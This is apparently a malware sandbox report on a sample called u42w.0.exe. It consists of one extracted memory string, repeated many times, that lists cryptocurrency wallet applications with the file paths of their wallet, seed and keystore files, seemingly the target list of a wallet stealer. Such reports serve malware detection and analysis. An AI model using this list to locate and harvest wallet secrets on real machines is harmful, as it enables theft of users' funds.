Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
